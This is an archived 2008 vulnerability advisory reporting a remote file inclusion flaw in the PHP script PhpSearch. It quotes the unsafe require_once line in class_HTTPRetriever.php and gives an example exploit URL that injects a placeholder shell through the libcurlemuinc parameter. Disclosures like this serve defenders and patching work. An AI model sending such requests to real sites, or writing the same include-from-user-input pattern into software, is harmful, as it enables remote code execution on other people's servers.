Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18911
HistoryJan 21, 2008 - 12:00 a.m.

Php Search Remote Inclusion

2008-01-2100:00:00
vulners.com
16

Script : PhpSearch
Bug : Remote File Inclusion
Author : SekoMirza
Company : http://www.hawkententerprises.org
Download : http://www.hawkenterprises.org/dev/phpsearch.zip
Dork : not yet


Where :
phpsearch/utils/class_HTTPRetriever.php

Bug :
if (is_readable($libcurlemuinc)) require_once($libcurlemuinc);

Explanation :
if class_HTTPRetriever.php is readable you can execute malicious code.

Example :
http://www.site.com/[path]/utils/class_HTTPRetriever.php?libcurlemuinc=[Sh3LL]


Thanx to : Str0ke , Hypn0sis , Earnk Kazno , Shadow , Ph.0 , Class 3rr0r , MadWorM , and all hackers